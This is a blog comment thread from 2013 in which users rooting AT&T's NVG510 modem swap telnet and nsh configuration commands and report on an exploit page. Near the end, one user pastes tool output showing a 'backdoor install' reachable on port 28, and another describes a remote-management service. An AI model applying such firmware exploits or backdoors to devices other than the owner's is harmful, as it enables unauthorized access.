3/25/2013 12:24:58 AM
Earlz
@Mattkilla this WILL NOT help. If you're getting a crappy connection speed, 99% of the time it's AT&T and it's infrastructure's fault. (for instance, paper wrapped wires that were first installed in the 40s is not going to be capable of a good connection) 
3/25/2013 2:23:13 PM
Anonymous
Hey Earlz,
Whats the best way to turn the nvg510 into a switch, I managed to do it by disabling the dhcp server and giving it an ip address outside of the main routers ip range. Is this enough? should i disable the firewall and is it possible to disable the broadband light it keeps flashing red. Thank you for all your time and work on this project, take care.
4/11/2013 6:25:49 AM
d0tmatrix
Thank you for the information! I was able to follow your directions to enable true bridge mode, but now I can't seem to figure out how to use my static public IP addresses assigned by AT&T. I am currently using DD-WRT on my router. If I enable the router to use DHCP to configure its IP, it is assigned a random public IP. I can use a traceroute to get my gateway IP. If I use this gateway IP and my private IP I was assigned, nothing works. If I connect the router to LAN 2- LAN 4 and use DHCP in DD-WRT I get a private IP from the NVG510 and everything works. I was assigned 4 static IP addresses. I can't seem to get Uverse Tech support to help me understand how my static IP works. 
4/12/2013 12:29:37 AM
Earlz
@dotmatrix Yea.... I have no idea? I would think it should *just* work if you manually configure your router behind bridge mode to use the static IPs. you might make sure your gateway and netmask is correct. I remember having some problem at some point with AT&T handing out a gateway which fell outside of the netmask, thus requiring me to manually override the netmask. 

Not sure if that applies in this case though unfortunately. I've never had experience with their static IP support
4/12/2013 4:42:56 AM
Anonymous
I am interesting in anyone's results with Static IP also.
I would love to use true bridge mode with this thing as I use PfSense but can't afford too much down time for trial and error.
Also do we have any way to make it ignore any firmware upgrades? My worry is we set this thing up, get it working great finally and a firmware upgrade jacks it up and locks telnet out but for now static IP true bridge would be great!
4/12/2013 4:30:07 PM
Anonymous
Thanks for the great work, I FINALLY got rid of the stupid redirect!

For those of you with modems on a different default ip (like me) here's what I did:
Copy the source code out of the page that enables telnet. Save, change the ipaddress, then launch the page. 
Maybe for future users, the page can be modified so that a user can enter the ip as a field as well.

4/18/2013 2:42:03 AM
Levi
@Earlz how do i connect using telnet?
4/22/2013 2:08:43 AM
Levi
@Earlz i enabled telnet on my pc but i cant seem to figure out how to connect to my router using telnet can someone help?
4/22/2013 2:20:35 AM
Levi
Never mind i got connected but how do i enable upnp?
4/22/2013 2:54:50 AM
Levi
when i type in the upnp or redirect code it simply says "usge: set OBJ.ITEM VALUE" WHY!!
4/22/2013 11:27:16 PM
Earlz
@Levi You have to get to `nsh` first. See the section surrounding the "fixing common problems" header
4/23/2013 4:43:12 AM
Levi
I have already done nsh. After that it shows up as axis something(not at my computer) but for  I can not change anything
4/24/2013 1:17:35 AM
Anonymous
Thanks for the tutorial, though my problem seems different than anyone else's.  What happens for me is the redirect, but only when browsing with the http port.  If I go to http://google.com, it redirects.  When I go to https://google.com, it works.  Yahoo messenger works, my gmail notifier works, but all websites will start redirecting when using port 80.  I've shut off the redirect per the tutorial above, but that just makes it redirect to 192.168.1.254 when having its "issues."  The only workaround I have is using a public proxy server when it's acting up.
4/30/2013 3:19:54 PM
JFH
Dude, I seriously need to send you some cash for this. 
I have been fighting with AT&T 'support' for over a month to get
rid of that stupid connection 'error' redirect message. This is what I wanted. I just did it
- rooted the blasted thing - now but confidant this will address the issue. Also disabled 
that worthless DHCP server they have on the unit. 
4/30/2013 10:01:31 PM
Anonymous
I have a problem that I can't seem to work around and wondered if you can help.
I have put the modem in pass-through (needed it for work, and AT&T didn't give a crap; so, I hacked it!)
But, now, my phone doesn't work.  My phone uses the modem for the "dial tone" (at least, that's what the tech told me).
It seems that forwarding everything to my internal router has disabled the phone line.  I thought I could get it
to work by putting vc-1 into the list of ports on link[2].  But, sadly, that does not work.  Any suggestions?
5/23/2013 2:13:25 AM
Earlz
With the way bridge mode is setup, maybe, maybe not. If you bridged it, you might try running an *extra* network cable from your router to your modem (use one of the non-bridge ports). I'm not sure it'd work though and it'd probably require some extra configuration. I didn't have an NVG510 which supported VoIP, so I don't know. 
5/23/2013 1:30:25 PM
sunnymat
Hello Earlz, this is really a great work..This has been very helpful in getting into this modem but i havent been able to get it to work like the way i wanted it to.. Can you let me know if this is possible - I switched to cable recently and have no use of this modem now so I was trying to set it up a wireless access point with a lan port plugged in directly to the back of my cable modem/router. I tried the true bridge mode You have mentioned above except i removed the ppp since i do not want that to happen but that doesn seem to work.. Can You let me know if i am missing something or this will not work..
5/24/2013 1:18:41 PM
Earlz
@Sunny I tried that exact thing, since the NVG510 is wireless N and my current wifi is wireless G. Just give up. I managed to get it to work, but I had to reset it once an hour or the wireless signal would become so weak as to be non-existent, apparently some kind of power saving feature I couldn't figure out how to disable. 

See also: http://earlz.net/view/2012/12/28/0230/how-to-reuse-an-nvg510
5/24/2013 5:01:17 PM
Tom
I'm having trouble. When I submit the form on your exploit page it takes me to a blank page. if I load http://192.168.1.254/cgi-bin/etherlan.ha directly it says 404 not found.
6/4/2013 1:33:17 AM
Nate
Thanks for posting this. I have been having a problem with intermittently slow connections and disconnects. I used your pass through setup and my internet works better than ever. I do have one question the modem is working fine, all diagnostics say pass but the broadband light blinks red? This was happening last night after I restarted the gateway for being slow. AT&T did a line test and said everything is fine. Thats why I landed here to root the modem. Any suggestions other than the true bridge mode?
6/6/2013 2:00:02 PM
Jice
This appears to open up telnet both internally to your network as well as externally.  Couple of questions:

1) Is it possible to configure to only allow telnet from within your network?
2) If/when accessing telnet externally, are passwords always sent encrypted?

Thanks,
Jice

6/9/2013 5:15:39 PM
Earlz
@Jice ick! On my modem, it only turned it on to the LAN by default(though there was an option to turn it onto WAN as well). I recommend after getting into the modem turning ssh on and telnet off in that case.. and look for an option to turn WAN access to it off, if possible. 
6/10/2013 3:36:06 AM
Jice
@earlz Sorry. I think that I confused myself.  I used my public IP address from within my network and was greeted by a telnet prompt, so I assumed it was publicly accessible.  But, I tried from an outside machine, and did not get a telnet prompt.

6/11/2013 4:39:02 AM
Anonymous
First of all THANKS for putting this together. It's awesome. However, I'm still fighting a problem and hope someone can help. I have 2 Xbox 360s using the same NVG510. I followed the procedure to enable Upnp but both Xbox NATs are Moderate instead of Open. I went back in and verified that Upnp is still enabled and it is. Anyone have ideas?
6/14/2013 10:59:03 PM
Earlz
It's impossible to have 2 xboxs have an open NAT type. The best you'll be able to do is one open and one moderate, unless you pay AT&T for an extra IP address. This is inherit with how the internet works. To get one to be open, you'll have to forward port 3074 (UDP and TCP) and port 88(UDP) to the xboxs IP address. 
6/15/2013 12:55:42 AM
The_NetZ
Hey, me again. closer and closer to a decent machine, lol. My current question regards power management for the wifi device. Normally under linux you can issue some iwconfig commands to enable/disable power management, and hopefully boost signal strength with that. However, during my last telnet session with a root shell it seems this is one of the "lacking" linux/unix utils you make mention of (why people feel the need to gut the awesome power of linux I don't understand [or perhaps I do and just don't want to really hate them for it]). is there an nsh or other command available to do the same?
7/3/2013 12:56:08 PM
Earlz
@Netz, yea they don't include iwconfig. Broadcom ships a proprietary (and very hard to use) utility called `wl`. You might try searching for some info about it, and I believe it does respond to `--help`. I was messing with something unrelated to power levels, but noticed that the help page mentioned power levels along with a big huge "adjusting this may cause your device to be illegal according to the FCC and/or fry your wireless chip" kind of warning. If you're going to adjust power levels, ensure you take small steps to ensure you don't overheat the chipset
7/3/2013 3:11:34 PM
The_NetZ
Yeah, I'm looking into that. I want to do as best as I can with it, within legal limits. I'm trying to set the google public dns server (8.8.8.8 & 8.8.4.4) but at the save step it keeps telling me "The database is dirty", which is really getting to irritate me XD. Any ideas what is wrong here?
7/5/2013 3:15:58 AM
The_NetZ
Actually nevermind, lol. I got the dns setup right, but have you had a look at busybox on this machine? could do some interesting things with that...
7/5/2013 4:35:34 AM
The_NetZ
And my third comment tonight XD, but I think you want to hear this, as I've figured out how to ssh into the NVG510
its actually so simple I don't see how you didn't figure it out yourself, considering how much you did, lol. From tilda (my favourite terminal emulator) I ran:
ssh admin@nvg510 
and gave it my admin password, and boom! I'm in, and 192.168.1.254/cgi-bin/logs.ha shows
"2013-07-05T00:54:33-05:00 L4 cshell[2995]: TS: "admin" completed login via SSH from 3232236002"
Note: I added the nvg510 to /etc/hosts to make telnet easier as I can tab complete the hostname nvg510 instead of manually typing the ip.
7/5/2013 6:02:31 AM
Ryan8431
I've been having problems similar to this link: https://discussions.apple.com/thread/2328853?start=0&tstart=0
Behind my NVG510 I have a D-Link router with various devices connected...PCs, PS3s, iPhones, iPads, Printers, etc.
ONLY when opening a browser from a secondary computer, the NVG510 loses sync.
The only way I can get it to sync afterwards, is plug my primary PC directly to the NVG510 and reset connections.
My primary PC is also the one who's MAC I have my router set to clone, and the same MAC defined in the NVG510 for Passthrough. Then I connect my router back up and everything is fine, until I try to open a browser from the secondary computer again...
Any thoughts?
7/5/2013 8:25:37 AM
David T.
Even with NVG510 switched to true bridge mode and my router handling everything, AT&T is sh*t... it boils down to four things:
1) They do some very proprietary management stuff with the NVG510 as far as DHCP leases and network provisioning. In true bridge mode the typical router doesn't have a clue how to handle it and the connection just goes south. A renew/release on the router and possibly a reboot of the NVG510 is necessary once a month to correct this kind of issue.
2) Especially with naked DSL, you are trying to pull 6, 10, 12Mbps over the standard telephone wiring in your house... this is a basic flaw with U-Verse, as standard telephone wiring was never designed to handle those speeds. It's why twisted pair cabling was developed. AT&T will give you twisted pair from the pole to your house, and a twisted pair cable from the modem to the wall plug, but won't replace the internal run except as a last resort.
3) U-Verse is very sensitive... minor issues in the transmission lines or at the CO will send y
7/7/2013 4:53:46 PM
David T.
Even with NVG510 switched to true bridge mode and my router handling everything, AT&T is sh*t... it boils down to four things:
1) They do some very proprietary management stuff with the NVG510 as far as DHCP leases and network provisioning. In true bridge mode the typical router doesn't have a clue how to handle it and the connection just goes south. A renew/release on the router and possibly a reboot of the NVG510 is necessary once a month to correct this kind of issue.
2) Especially with naked DSL, you are trying to pull 6, 10, 12Mbps over the standard telephone wiring in your house... this is a basic flaw with U-Verse, as standard telephone wiring was never designed to handle those speeds. It's why twisted pair cabling was developed. AT&T will give you twisted pair from the pole to your house, and a twisted pair cable from the modem to the wall plug, but won't replace the internal run except as a last resort.
3) U-Verse is very sensitive... minor issues in the transmission lines or at the CO will send y
7/7/2013 4:53:46 PM
David T.
3) U-Verse is very sensitive... minor issues in the transmission lines or at the CO will send your speeds into the tank. Every few months my speeds take a dump and I have to call up and get service... they always send an inside tech first which is useless (because I know my setup is fine) and then I have to wait for an outside tech to be dispatched. If I am lucky, the outside tech can fix the problem, if I am not lucky, the outside tech has to escalate even further meaning more delays...
4) This means every few months when I call AT&T, the first level tech wants to run diags, and invariably tells me that they can't find my modem (because I have it in true bridge mode) so I have to do a full reset and leave it factory defaults until the issue is fully resolved (or the rest of the techs are going to be like, "hey, your modem isn't responding...) Then I have to go back and reconfigure the modem afterwards each time back into true bridge mode.
--For people who are like, "why do you need true bridge mode?" 1) Do
7/7/2013 4:54:20 PM
David T.
--For people who are like, "why do you need true bridge mode?" 1) Double NAT is never an efficient way of setting up a network, and 2) I am absolutely unable to do SSL tunneling unless I put the NVG510 in true bridge mode.
7/7/2013 4:54:39 PM
JDS7801
I'm late to this game but I am happy to report that my UVERSE via NVG510 is now usable as a primary link to the Internet. I still cannot believe that AT&T never updated their software to eliminate the "Potential Connection  Issue" cacheing problem. It must of cost them thousands of dollars in support calls. Thanks for helping us fix a bug that they were unwilling to address. I address the DNS problem by putting hard DNS addresses in every machine that connects through the NVG510. Earlz you are the Man!!!
7/9/2013 3:48:12 PM
Matt
Here are the commands I used to change the DNS:
set ip dns primary-address 8.8.8.8
set ip dns secondary-address 8.8.4.4
set ip dns proxy-enable off
validate
apply
save
7/11/2013 6:16:36 PM
mroboto
I ran your code on the 510, and got telnet access (finally!). After poking around a few, I tried "configure", and got access to the configuration prompt. I used " set ip dns primary-address x.x.x.x ", and got the shell prompt, no error.
exiting, I was asked to save, hit " y ", and checked the modem status. DNS CHANGED! SUCCESS! THANKS A MILLION!
7/14/2013 8:25:44 AM
BellTech
Thank you, thank you, THANK YOU for all of the hard work and hacking you have put into the NVG510! The resolution of the LAN IP redirect issue has been a godsend for many irritated customers of mine. Couple that with a true bridge mode config that is not affected by an RG hard reset (customers love mashing recessed buttons) and my life at work has become much easier. Thank you again, sir. 
8/1/2013 4:31:03 PM
Earlz
@BellTech I was told there was some internal documentation now at AT&T to use my website, basically. I think that's pretty awesome. I never expected AT&T themselves would take an interest in this site(although I'll always provide all this information free and with no strings attached). 
If it's not confidential(I'd like to show it to others), is there anyway you could send me a PDF or some such of it? I'm very curious as to what exactly they're instructing. 
8/2/2013 2:28:16 PM
bdc-devel
Quick question, I got "True bridge mode" setup and all is fine, I also have an ipv6 enabled line ... while IPv6 works fine when connected to port 2, the NVG510 refuses to send the ipv6 info to my router on port 1 ... any suggestions ?
8/8/2013 9:04:45 AM
Earlz
@bdc this is because AT&T's IPv6 support isn't "native". They tunnel the IPv6 through IPv4 with software. So, when you do true bridge mode, you lose that feature. Difficulty of setup ranges from impossible to easy, depending on your router behind it. Look up IPv6 tunneling. Here is one I found quickly: https://www.sixxs.net/main/
8/8/2013 1:53:41 PM
bdc-devel
Ah yeah, I have a ZyXel NBG4615 behind, will look it up, thanks!
8/8/2013 4:00:05 PM
Anonymous
Is it possible to change the modem's MAC address through root? 
8/13/2013 3:37:02 AM
Earlz
@Anon yes, it's possible to change the Mac Address. It's quite risky though and I'm not sure if it's reversible. Get to the `nsh` shell and then I think `mfg mac-info <MACADDRESS>` should work. Messing with the mfg command though is very dangerous and not reversible by factory reset. I can't guarantee it won't brick your modem
8/13/2013 5:39:34 AM
Anonymous
@Earlz

Thanks for the info, the reason I want to change my MAC address is because I am thinking that would give me a new IP address. I have had same u-verse IP forever... I've tried everything to change it to no prevail. 
8/13/2013 8:53:16 PM
Anonymous
@Earlz

Is it possible to brick the modem just by changing one number in the MAC address? I'm kinda scared to do it.
8/15/2013 8:25:38 PM
Anonymous
I changed the modems MAC Address through the root, and it did not issue me a new external IP.
8/16/2013 12:36:14 AM
Anonymous
You cant change your IP address with UVerse. Think of UVerse as working like a really big LAN and you have not a static, but a "DHCP reservation" whereas you are identified by your MAC address and then always assigned the same IP. So you maybe could technically get a different IP by changing your MAC but it would likely end your service as your MAC is tied to your account and if you were to change your MAC back again, you would get the same address again.
8/21/2013 5:50:34 AM
Anonymous
I enabled true bridge mode and I assume it is working as my router now displays a WAN ip and gateway, but I cant figure out now how to access the modem when behind the router? Previously I was using the passthrough method with a pinhole so i could access my modem and router both via "pinhole" by having each on different class c subnet with /16 mask, this doesnt seem to work after puting modem in true passthrough. Ideas?
8/21/2013 6:39:42 AM
Anonymous
The easiest way to access the modem when behind a router and bridged is to hook one of the NON-BRIDGE ethernet ports from your modem to your router.. So, you'd have 2 ethernet cables between your modem and router. With this method, your router would have a WAN IP and a LAN IP of (say) 192.168.2.1 and your Modem would then have no WAN IP, and have a LAN IP of 192.168.1.254.. The only thing to be wary of is that you want to ensure that your router is handing out IP addresses through DHCP and not your modem.. This may require disabling the modem's DHCP server
8/21/2013 2:00:03 PM
Phillip T.
I have the NVG510 uverse setup, but I also my at&t VOIP configured through this as well, and was 
curious if anyone has bridged this nvg510 and lost the VOIP?  I really want to do this, but I also
need to keep my VOIP service going.  I have already hacked and ssh'd into the nvg to change
the primary, and secondary dns, and my voip was not affected.  I was a little paranoid to 
do the complete bridge until I heard from someone else with my same setup.

Thanks for sharing this hack!  
8/23/2013 12:29:47 AM
Earlz
If you do bridge mode with VOIP, I'm 99% sure you'll lose VOIP service.. You can try it, but be ready to do a factory reset if you lose service
8/23/2013 4:47:35 AM
Phillip T
I suppose I will just try to work with the IP Passthrough...cause I want to implement my pfsense
box into the mix....  Perhaps switching over to UVerse wasn't such a grand plan after all :(

Thanks.
8/23/2013 12:05:10 PM
Anonymous
After telnet I am able to set variables, but validate, apply and save commands are missing:
# validate
/bin/sh: validate: not found
# apply
/bin/sh: apply: not found
# save
/bin/sh: save: not found
9/6/2013 2:52:22 AM
Anonymous
Nevermind. Didn't see the 'nsh' line
9/6/2013 2:57:05 AM
Nick
Earlz, you are awesome. This fixed all of my issues except for the fact that my connection is super slow. Thanks!
9/6/2013 4:33:46 AM
Pedro
Earlz, you have saved me hours of headaches!  The NVG510 has been a piece of junk since the day AT&T gave it to me.  I'm on my 3rd one--they keep thinking it's hardware when I know the problem is software.  I used to have DSL Extreme with a bridged 2Wire modem of some kind and will go back to them as soon as my low price with AT&T is over.

I'm a relative novice (not sure what "nsh" means) but I found your instructions easy to follow -- I had never used Telnet before.  Now I have put my trusty Netgear router (which has 3,586 more features) back in play.

One possibly dumb question: by enabling Telnet via "set mgmt.shell.telnet-port 23", have I opened up my modem to the world?  Should I disable it by entering "set mgmt.shell.telnet-port 0"?

Finally, http://tuxhelp.org/doku.php%3Fid=networking:taming_nvg510.html says that bridge mode is enabled via "set link[2].port-vlan.ports "vc-1 lan-1"" which is slightly different than your command.  Is there a functional difference?

Thanks again for saving my san
9/9/2013 7:35:39 PM
Uncommonly common uncommon name
This is very helpful, thank you. 
It is worth noting that my name is levi
9/10/2013 4:55:05 AM
Earlz
@Pedro, no you haven't opened up telnet to the world, only to your local network. 
9/10/2013 5:07:08 PM
Hurtzdoenut
@ Earlz

This is probably irrelevant by now but I just found this thread. Kudos for the info btw. I read earlier that you tried to use the NVG510 as a wifi connection due to your other only being a G standard. You also mentioned the reason you quit using it was due to it's "power saver mode" or whatever was bogging the signal. Have you tried to manipulate the "phy.wl80211.wmm.powersave"? It has an on/off switch.

Just curious.
9/11/2013 8:24:41 AM
Hurtzdoenut
 
				
			
9/11/2013 8:26:51 AM
Hurtzdoenut
For Windows 8 users,

You may have to install the telnet service before you can try any of this. To do so, Right-click on the bottom left of your screen (where you access your start menu) and click "Programs and Features" (or do so by going through control panel). On your left hand side you will see "Turn Windows features on or off". Click on that and scroll down until you see a check box that says "Telnet Client" Check that box and click OK. Wah Lah!!! Youcan now access telnet through your command prompt. Telnet, by default, is not installed in Windows 8 for security purposes.
9/11/2013 8:34:20 AM
Anonymous
@Pedro
The "set link[2].port-vlan.ports "vc-1 lan-1" shouldn't be any different than the one described in this thread (In theory). If you notice, link[1] supports more than one port. I would imagine link[2] should have the same functionality as vc-1 is only a virtual port.

Also I would like to note that the website mentioned references this blog for it's information.

References

    http://lastyearswishes.com/blog/view/4fcc69bc4aa5d8385420c705
    http://lastyearswishes.com/blog/view/4fcff51b4aa5d8385420c706

9/11/2013 8:57:15 AM
Anonymous
@Anon btw lastyearswishes.com is the old domain name of this blog. 
9/11/2013 3:31:14 PM
Anonymous
^^^ I was only pointing out that the websites pedro listed had links to this blog.
9/11/2013 6:29:47 PM
Anonymous
i get 404 when i click save after inputing the nonce value
9/12/2013 11:24:02 PM
Earlz
Are you sure your modem is actually at 192.168.1.254? 
9/13/2013 1:51:31 PM
Kal
Once the modem is bridged, is the concurrent session restriction removed? I am purchasing one as I think that is the trouble that I am having at my school with my 3801.
9/14/2013 9:15:43 PM
Earlz
@Kal, yes it should be removed assuming that your router behind it is capable of handling enough concurrent sessions. Note this is only for the NVG510 though
9/15/2013 2:00:50 AM
Mongo
Enabling True Bridge mode does kill the VOIP service on my NVG510 (at least if that's the only thing you change).  If anybody has any clues for making VOIP work in True Bridge mode, I would be pleased to experiment and report results.  So far, I have not found any objects that appear to be VOIP related from the nsh shell.  However surely there must be something that causes it to get enabled and disabled?  Might serve as a starting point?
 
9/15/2013 9:44:43 PM
Earlz
I am almost for sure that it's flat out impossible to use VoIP with true bridge mode. True bridge mode basically takes the modem out of the traditional network. As far as the modem can go, it doesn't have an internet connection
9/16/2013 12:56:08 AM
Captain Red Beard
I have 2 work computers in the house: mine and my roommates. We both use Cisco VPN to access our employers networks. Both worked fine when I had ATT DSL and used the 2Wire gateway. Now that I have switched to U-Verse internet and have the NVG510 gateway, my work computer connects via VPN, but my roommate's does NOT, Tried a custom NAT/Gaming setting and an IP Passthrough and nothing works. Is there a root fix that I can employ to fix this problem? All other computer, eReaders, smart phones, and wireless printer connect with no problem.
9/19/2013 10:43:28 PM
Earlz
Yea, I'm not really familiar with Cisco VPN, so I don't know how it works. I'm not for sure what would be wrong with it
9/20/2013 2:54:03 PM
Anonymous
Hi I rooted the nvg510 and put it in true bridge mode I added a linkys e2500 router and set the DNS for openDNS. Everything has been working as it should for the last few days, but the last week I have been struggling again. My problem is the fact that nvg510 seems to still disconnect and reconnect like it did before I rooted it.The reason I think its the nvg510 is I will go into the room and look at the lights on the device the broadband light will be blinking while the service light is red. Then it seems to reset itself after a few mins and then continues. What could be cause of this?
10/10/2013 6:03:34 AM
Earlz
@Anonymous. It sounds like you have either a line or hardware problem. I'd do a factory reset of your modem and then call AT&T about it. (do the factory reset so that AT&T doesn't blame your custom configuration as being the problem) 
10/10/2013 2:03:33 PM
Kevin
Hi I would like to use NVG510 as wireless access and turn-off the WAN port? Will this work: set link[2].port-vlan.ports off
10/15/2013 1:36:12 PM
Kevin
The flashing red LED is very annoying to my wife.. lol :)
10/15/2013 1:37:58 PM
Earlz
@Kevin I would consider a piece of electrical tape over the LED :) 

You might run into problems using it as a wireless access point, but not using it's WAN. It will enter a terrible power saving mode or something and drop connections

http://earlz.net/view/2012/12/28/0230/how-to-reuse-an-nvg510
10/15/2013 1:50:19 PM
Anonymous
LOL.. Love that link! I already thought about putting tape over the LED. Actually it's been working great as an access point with exception to the annoying LED and redirect.enable hijacking my browser because of no connection to the WAN port. I turned-off the redirect.enable using your instructions and Hyper Terminal...
10/15/2013 2:49:22 PM
LECE73
Hi is there a way to run this when the router is configured for a network 192.168.0.1 ? We have a bunch of servers running on that network and changing it will be a mess and I need to change the DNS servers on the router.

Thank you very much!

Luis
10/18/2013 1:46:56 AM
Earlz
@LECE73, yes. Download the HTML page, and then open the file in a text editor and do a search and replace for 192.168.1.1 and 192.168.0.1 (or whatever the desired IP is). If that sounds too complicated, you could also try my Android application that makes it easier if you prefer not to mess with the technical details http://earlz.net/view/2013/08/03/2006/nvg510-fixer-an-android-application
10/18/2013 1:45:39 PM
Sonny
@Earlz, For someone who has Att DSL ppoe service and not Uverse. Do you think it may be possible to use a NVG510 as an ATA for VOIP behind an Att 3600 or Westell E90-6100 modem?
Do you know if it's possible to configure one of the NVG510's Lan ports to be a WAN port.   
10/20/2013 5:05:21 PM
lowdrag
2 questions I have not seen yet addressed? (blind?) 
1 How do you save the config?
2 if needed, how do you upload a saved config.
I don't want to have to go through redoing all the settings if this gets wiped or a new box is needed.
THnaks,
10/21/2013 3:17:27 AM
Earlz
@Sonny, ooh. That's an interesting idea. It may be possible to. You'd have to browse the configuration options and try stuff yourself though. Look at the pastebin of the configuration options I posted and search for "ppoe" for ideas. I've never tried anything like it before, but it might be possible. 
And for the LAN as WAN, yea that's what true-bridge mode is. 

@lowdrag I don't believe it's possible to save or directly load the configuration settings to a file. 
10/21/2013 6:07:23 AM
McBill
Thank you Earlz.  I was about ready to throw my modem in the trash because of that stupid redirect issue.
10/23/2013 4:41:37 AM
Hitek146
I have NVG510s that either have a blown DSL port, and others that have been de-registered by AT&T that still work as access points.  I have used similar tricks with older Cisco VoIP routers that only had only one ethernet port, so I used VLANs with a VLAN compatible switch to break out the WAN and LAN ports, using the single ethernet ported device as a router.  I know bandwidth would be reduced using one ethernet port for both ingoing and outgoing traffic, but it worked well to utilize an otherwise outdated and worthless device.  I read all of the above comments hoping to find someone that wanted to use this modem as a normal wired router, and based upon my experience, it appeared to me that the exact configuration I would need would be your bridging example, while disabling the DSL interface, and plugging an internet connection into the LAN1 port.  From the above comments, though, it appears as if this configuration breaks NAT to the LAN ports, but maybe that is only because the DSL interface hasn't been dis
10/24/2013 4:25:12 AM
Earlz
Yea, that would break the firewall. It would function as a dumb switch in that situation. It might be possible to use it as a router with NAT and firewall through an ethernet port, but I have never tried that configuration
10/24/2013 4:51:10 AM
Jeff
It looks like AT&T just did a firmware update (9.0.6h2d30) and this trick suddenly stopped working. The bold red text on the response page that said "Changes Saved" now says "Message Format Error."

But I notice there is now an HTTP server running on 192.168.1.254 port 7547 but it just returns "401 Unauthorized." No idea what the username and password is, I tried "admin" and the access code but that doesn't work.

Oh, well - it was fun while it lasted!


10/29/2013 11:07:49 PM
Earlz
Oh no :( What region are you in? 
10/30/2013 6:23:28 AM
Anonymous
TX Gulf Coast
10/30/2013 7:19:33 AM
Different Sonny
I also just ran into Jeff's problem. Net went down yesterday. Checked everything on my end, figured ATT rep would tell me to reset everything so I did it before I called. Then I called and found out it was just an outtage in the area. Tried rooting it again and am running into this wall. Also southwest Texas.
10/30/2013 7:10:56 PM
Anonymous Tier 2 Agent
Yes, Looks like the vulnerability was found and patched with yesterday's firmware push.

Getting "message format error" when attempting to enable telnet.
10/30/2013 8:40:44 PM
Earlz
I'm still in shock that AT&T would kill our mutually beneficial relationship(by patching a local-only exploit), while not actually fixing the problems that end users are having with their modem. 
10/30/2013 8:52:42 PM
Jeff
Hey, at least it's good to know that AT&T didn't single me out for a firmware upgrade :-o

I found some discussion of the port 7547 thing here:
  http://www.dslreports.com/forum/r28663263-NVG589-next-ATT-U-Verse-firmware-opportunities

Someone on that forum claims the username will be the device's serial number and the password is stored in the config under "mgmt.cwmp.cr-password" but that doesn't help much if you can't access the config database to begin with :-(
10/31/2013 6:25:25 AM
Earlz
Hmm, never heard of the NVG589. Must be a new, but similar modem. Yea, cwmp probably won't help much, especially since it's such a pain to access. I guess I'll have to start trolling the dslreports forums more. I didn't know there were discussions like this there. 
10/31/2013 2:06:53 PM
McBill
Pretty crummy of AT&T to disable access to all those modems without fixing the reason we need access to the stupid things!

I have firmware version 9.0.6h0d48 on my modem, and through a massive amount of fooling around, I got my modem working with DSL service from Qwest/CenturyLink.

Before I got it working with Qwest DSL, I was looking through the dump and found this:
ip.dynamic-dns.enable          = on
ip.dynamic-dns.service-type    = dyndns

I'm a hardware engineer, not a software engineer, but I think this might be AT&Ts back door into the modem.  dyndns is a remote access service.  See http://dyn.com/remote-access/

I turned it off.  I'm not sure if my modem didn't upgrade itself because I made this change before the evil upgrade came out, or if it is because I am not on the AT&T network.
11/1/2013 5:11:58 AM
Earlz
dyndns is just something so you can point to your modem on the internet as `foobar.dyndns.com` instead of `64.123.45.12` or some such. The reason it didn't update for you is because you're not on AT&T's network and therefore, a value isn't set for the CWMP stuff. CWMP is how they do remote control and remote updates. 

Also, please do not post links to private servers. Yes, I know they exist, but I don't want to be advocating that people go to them here. They contain confidential documents, even if they are publicly accessible. Any comments with links to them will be deleted
11/1/2013 1:53:56 PM
Ralph
Wow. I guess it's time to buy a new modem just in case. Besides, Google's dns timing out is a pain. I won't be getting a Motorola again for sure. Luckily, I still have google's public dns in my modem. I tried to change my secondary dns entry and it didn't work. The only thing that worked for me is to change the dns entries to fix the thing. I sure won't be doing a factory reset.
11/3/2013 12:44:31 PM
Earlz
Ralph and future viewers. I have a new root exploit on the NVG510 that should also work on few other things running Netopia OS (NVG589 and some kind of modem in Switzerland). I'm still testing it though to ensure that it's safe because it's marginally less safe. If you want to wait for just a few more days I'll have it published. I just want to ensure it's not going to brick or permanently break your modem 
11/3/2013 4:30:42 PM
Ralph
Nice. Thank you.
11/4/2013 1:55:05 AM
ThaCrip
i also noticed on a recent reset of my modem earlier today that i get the same error as listed above with the "Message Format Error" and that the usual exploit does not work. i am in Michigan on AT&T U-Verse with the NVG510 modem.

but it's nice to see Earlz got a work around coming in the near future and that it's permanent which is a huge plus ;)

p.s. so far in the 4-5 hours i been using my AT&T U-Verse internet after reset of modem it's not acted up with the extremely annoying connection problem alert which completely ruins your internet experience as everyone in here already knows.
11/6/2013 1:42:28 AM
Earlz
I'm hoping that they've improved that at least, so that it doesn't happen as often. And with the latest firmware, they removed the "filter check" which caused this problem at times as well. But I've still been getting reports of it happening
11/6/2013 2:56:14 PM
contact420
My NVG510 was replaced by the Uverse guy yesterday, and its not running 9.0.6h2d30 yet. Is there a way to disable the firmware update through rooting?
11/8/2013 2:09:06 AM
Earlz
@contact, I already have the page updated :) Just use the new exploit, it'll survive firmware updates and factory resets
11/8/2013 2:52:42 AM
contact420
@Earlz Thank you so much!!! 
11/8/2013 5:02:43 AM
Anonymous
Thanks for the update Earlz ;) (and knowing this is permanent is a big plus)

side note: i was running 'NVG510 9.0.6h2d30' for a couple of days or so now before i installed this new exploit and i did not have any issues with that annoying connection problem alert which makes me think AT&T did fix some stuff (like you mentioned?) in their modem to where if it does come up it must be much less common i would assume.

either way, i installed this hack as a bit of a insurance plan. plus, it's nice to have the router doing the PPP stuff as now my router shows my actual IP address for the WAN instead of the NVG510's internal network IP of the usual 192.168.x.x variations.
11/8/2013 9:13:51 AM
Brock
How do I know if it worked? Here's what happened:
Checked for backdoor install on port 28 - did not appear to be installed. Proceeded with install
Visited update.ha page
Found nonce on page!
Authentication required. Attempted to login to web interface.
Found nonce on page!
Modem firmware appeared as '9.0.6h2d30'
Sent backdoor install script
Got response after backdoor install failed. It's probably still ok, continuing..
Rebooting modem - Waiting 2 minutes
Backdoor install accessible at port 28 is sucessful! - Logged in as admin...
Assertion Failure: nsh shell does not appear to be working... or something
Attempting to continue despite possible error
Sending set link[1].port-vlan.ports "lan-2 lan-3 lan-4 ssid-1 ssid-2 ssid-3 ssid-4"
Sending set link[2].port-vlan.ports "lan-1"
Assertion failure: validation did not appear to be successful
Attempting to continue despite possible error - Changes Saved - Done!
So... What just happened here?
11/8/2013 4:47:12 PM
Anonymous
@ Brock... i would reset your modem and then get back into the modem and make sure you are at the correct prompt before doing anything...

